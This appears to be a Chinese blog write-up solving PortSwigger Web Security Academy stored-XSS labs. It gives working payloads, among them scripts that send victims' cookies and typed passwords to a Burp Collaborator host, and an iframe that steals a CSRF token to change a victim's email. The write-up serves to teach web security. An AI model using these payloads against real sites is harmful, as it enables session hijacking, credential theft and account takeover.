Portswigger web security academy:Stored XSS

Stored XSS into HTML context with nothing encoded

  • 题目要求

    提交评论,调用alert函数

  • 解题过程

    直接祖传payload就行

Stored XSS into anchor href attribute with double quotes HTML-encoded

  • 题目描述

    评论功能点有存储型xss

    要求当author name被点击的时候调用alert函数

  • 解题过程

    <p>
    
	<img src="/resources/images/avatarDefault.svg" class="avatar">                     <a id="author" href="https://test.test">name</a> | 24 May 2020
    
</p>

    随便输个链接测试一下,发现输入的website被直接嵌入到了href

    构造payload:javascript:alert()

Stored DOM XSS

  • 题目描述

    评论功能点有存储型dom-xss,调用alert函数即可

  • 解题过程

    关键代码

    function escapeHTML(html) {
    
        return html.replace('<', '&lt;').replace('>', '&gt;');
    
}
    
let newInnerHtml = firstPElement.innerHTML + escapeHTML(comment.author)

    注意这里的escapeHTML函数的定义,使用了replace函数,js的replace函数有个特性,只会替换最开始出现的一个字符,所以

    构造payload:<><img src=x onerror=alert()>

Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped

  • 题目描述

    评论功能点有存储型xss

    要求当author name被点击的时候调用alert函数

  • 解题过程

    这是上上道题的升级版,<>"会被HTML编码,'\会被addslash

    关键代码

    <a id="author" href="https://aaaaa\'&quot;`\\" onclick="var tracker={track(){}};tracker.track('https://aaaaa\'&quot;`\\');">asd</a>

    可以看到website直接被嵌入到了hrefonclick,因为后端检测了url格式,所以href无法进行xss

    onclick,考虑如何闭合引号,注意到这里是html+js环境,所以可以使用HTML实体编码/unicode编码,但是\会被addslash,所以只能用HTML实体编码

    构造payload:http://xss'-alert()-'

    这里涉及到一个js的知识点,eval('xss'-alert()会弹窗,即js语境中,字符串与语句进行运算,会执行语句

Exploiting cross-site scripting to steal cookies

  • 题目描述

    博客评论点有存储型xss

    要求盗取cookie并模拟被盗者身份

  • 解题步骤

    这道题要用到Burp Collaborator,这是一个burp自带的测试工具,贴一篇介绍

    简单来说就是一个用来接收并返回数据的接口,类似于自己搭的vps接收cookie

    构造payload:

    <script>
    
fetch('https://xxxxxx.burpcollaborator.net',{
    
method:'post',
    
body:document.cookie
    
});
    
</script>

    放到评论区,然后在Burp Collaborator Clientpoll一下拿到cookie,再替换掉自己的cookie就可以

Exploiting cross-site scripting to capture passwords

  • 题目描述

    在博客评论点有存储型xss

    要求盗取usernamepassword并登录

  • 解题过程

    这道题参考了官方的solution,没有过盗取usernamepassword的思路

    <input name=username id=username>
    
<input type=password name=password onchange="if(this.value.length)fetch('https://4glwxnk77bznm13y44j75a137udl1a.burpcollaborator.net',{
    
method:'POST',
    
mode: 'no-cors',
    
body:username.value+':'+this.value
    
});">

    payload利用了usernamepassword接口,在用户访问页面时自动填写,这里有点脑洞题的感觉,因为这里的赋值是需要后台进行渲染,或者通过get传值的。

    但payload思路可以借鉴

Exploiting XSS to perform CSRF

  • 题目描述

    在评论点有存储型xss

    要求修改查看评论的用户的邮件地址

  • 解题过程

    先登录给的账号,修改email,用burp看下数据包

    关键部分

    POST /email/change-email HTTP/1.1
    
Host: accf1faa1fa54c128098504e00910043.web-security-academy.net
    
Connection: close
    
Content-Length: 58
    
Origin: https://accf1faa1fa54c128098504e00910043.web-security-academy.net
    
Accept-Encoding: gzip, deflate
    
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    
Cookie: session=hVm5TBng8eVK17OV1ulcF6IP5xbwzcu4

email=aaaa%40bbb.ccc&csrf=aIMl9DOIMdHZQ4qsl05r4dERRyrRzFm6

    这里需要一个csrf token,所以要用到iframe

    构造payload:(可行)

    <iframe src='https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email' name='xxx'  onload="
    
var csrf = window.frames['xxx'].document.getElementsByName('csrf')[0].value;
    
fetch('https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email/change-email',{
    
method:'post',
    
body:'email=aaa@bbb.ccc&csrf='+csrf
    
});">
    
</iframe>

Portswigger web security academy:Stored XSS的更多相关文章

  1. Portswigger web security academy:Reflected XSS

    Portswigger web security academy:Reflected XSS 目录 Portswigger web security academy:Reflected XSS Ref ...

  2. Portswigger web security academy:DOM Based XSS

    Portswigger web security academy:DOM Based XSS 目录 Portswigger web security academy:DOM Based XSS DOM ...

  3. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  4. Portswigger web security academy:Clickjacking (UI redressing)

    Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...

  5. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  6. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

  7. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  8. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  9. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

随机推荐

  1. apk签名、包名

    //通过各手机管理软件,如如360.豌豆荚等查看 //使用命令行,可以查看到permission.packagename.title.versionCode等 aapt dump badging ~/ ...

  2. 利用kali系统制作最简单的OS

    制作最简单的OS 一.生成.bin文件 1.创建Boot.asm文件,输入相应的汇编代码 org 07c00h ; mov ax, cs mov ds, ax mov es, ax call Disp ...

  3. IPFS矿机封装原理解释

    近期无论是从媒体.新闻的高度曝光,还是市场拓展的覆盖度来看,IPFS 俨然成为今年最值得关注的行业话题与入场趋势.对于许多刚了解 IPFS 的小白来说,矿机的「封装」.「有效算力」和「原值算力」这些概 ...

  4. Github Actions 还能做这些事

    前言 最近公司内部项目的发布流程接入了 GitHub Actions,整个体验过程还是比较美好的:本文主要目的是对于没有还接触过 GitHub Actions的新手,能够利用它快速构建自动测试及打包推 ...

  5. java例题_15 有小到大排序

    1 /*15 [程序 15 排序] 2 题目:输入三个整数 x,y,z,请把这三个数由小到大输出. 3 程序分析:我们想办法把最小的数放到 x 上,先将 x 与 y 进行比较,如果 x>y 则将 ...

  6. [hash-bfs]USACO 3.2 Magic Squares 魔板

    魔 板 魔板 魔板 题目描述 在成功地发明了魔方之后,拉比克先生发明了它的二维版本,称作魔板.这是一张有8个大小相同的格子的魔板: 1 2 3 4 8 7 6 5 我们知道魔板的每一个方格都有一种颜色 ...

  7. SQL必知必会,带你系统学习

    你一定听说过大名鼎鼎的Oracle.MySQL.MongoDB等,这些数据库都是基于一个语言标准发展起来的,那就是SQL. SQL可以帮我们在日常工作中处理各种数据,如果你是程序员.产品经理或者是运营 ...

  8. @babel/preset-env使用polyfill遇到的坑

    场景还原 最近将一个项目由babel@6升级到babel@7,升级后最重要的两个包: @babel/preset-env: 提供代码的转换和API的polyfill的能力 @babel/plugin- ...

  9. Java后端进阶-JVM参数调优

    package com.study.performance; import org.springframework.boot.SpringApplication; import org.springf ...

  10. 算法:第一节课Master定理

    1.ctex:要求用Tex编辑器进行作业的书写 2.与东大本科有差距,还需要多点努力才行. 3. 4.考试不考概念 5. 6.时间复杂度和空间复杂度 7.算法好坏的评价标准 8.基本运算 9.时间复杂 ...